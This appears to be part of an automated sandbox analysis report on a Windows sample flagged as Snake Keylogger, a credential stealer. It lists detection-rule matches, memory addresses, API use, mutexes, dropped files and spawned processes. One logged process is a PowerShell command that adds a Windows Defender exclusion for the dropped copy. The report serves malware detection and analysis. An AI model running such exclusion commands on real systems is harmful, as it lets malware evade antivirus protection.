              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319BBD37_2_0319BBD3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319CA317_2_0319CA31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_03194AD97_2_03194AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031998587_2_03199858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319BEB07_2_0319BEB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_031935707_2_03193570
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0319B4F37_2_0319B4F3
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E0A0B98_2_00E0A0B9
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E008788_2_00E00878
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E013D08_2_00E013D0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E083798_2_00E08379
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E01C608_2_00E01C60
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E035A88_2_00E035A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E026988_2_00E02698
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E050008_2_00E05000
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E059288_2_00E05928
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E021188_2_00E02118
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E059198_2_00E05919
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E092D08_2_00E092D0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E092AD8_2_00E092AD
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E05BA08_2_00E05BA0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E05B908_2_00E05B90
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E053088_2_00E05308
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E044A88_2_00E044A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E044998_2_00E04499
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E08C708_2_00E08C70
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E08C298_2_00E08C29
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E05DA98_2_00E05DA9
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E016A08_2_00E016A0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E056A88_2_00E056A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E056B88_2_00E056B8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_00E04FF08_2_00E04FF0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09A6176C8_2_09A6176C
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09A61C688_2_09A61C68
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DBB1A88_2_09DBB1A8
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DB48408_2_09DB4840
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DB5AD08_2_09DB5AD0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DB5AE08_2_09DB5AE0
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DB64788_2_09DB6478
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DB64688_2_09DB6468
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DB44088_2_09DB4408
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeCode function: 8_2_09DB3FD08_2_09DB3FD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303B32812_2_0303B328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303610812_2_03036108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303C19012_2_0303C190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303C75212_2_0303C752
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303C47012_2_0303C470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303BBD212_2_0303BBD2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303CA3212_2_0303CA32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_03034AD912_2_03034AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303985812_2_03039858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303688012_2_03036880
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303BEB012_2_0303BEB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303357212_2_03033572
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0303B4F212_2_0303B4F2
              Source: file.exeStatic PE information: invalid certificate
              Source: file.exe, 00000000.00000000.2130361419.00000000005B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexWoP.exe" vs file.exe
              Source: file.exe, 00000000.00000002.2190224781.00000000094A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
              Source: file.exe, 00000000.00000002.2185937260.00000000029E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2191673720.000000000A400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000002.2190462455.0000000009667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamexWoP.exe" vs file.exe
              Source: file.exe, 00000000.00000002.2186804007.0000000004226000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2185937260.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
              Source: file.exe, 00000000.00000002.2183724547.0000000000C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenamexWoP.exe" vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.411c690.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.41c3878.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.44d29e8.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0.2.file.exe.4408da8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000007.00000002.2266573165.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000008.00000002.2233081731.0000000004118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2186804007.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: file.exe PID: 3752, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: RegSvcs.exe PID: 7276, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: aVmZDnwW.exe PID: 7328, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: aVmZDnwW.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.44d29e8.3.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.411c690.3.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 8.2.aVmZDnwW.exe.41c3878.5.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.a400000.6.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4408da8.4.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: _0020.AddAccessRule
              Source: 0.2.file.exe.a400000.6.raw.unpack, C346ht9Y1xxbI8GhL8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, C346ht9Y1xxbI8GhL8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.4408da8.4.raw.unpack, C346ht9Y1xxbI8GhL8.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: _0020.SetAccessControl
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.file.exe.446dbc8.2.raw.unpack, QIPlbgwOxDNvtcBdQw.csSecurity API names: _0020.AddAccessRule
              Source: classification engineClassification label: mal100.troj.evad.winEXE@26/12@2/2
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\aVmZDnwW.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\aVmZDnwW.exeMutant created: \Sessions\1\BaseNamedObjects\hCdDPxqnddhANFf
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9FE1.tmpJump to behavior
              Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeReversingLabs: Detection: 71%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aVmZDnwW.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
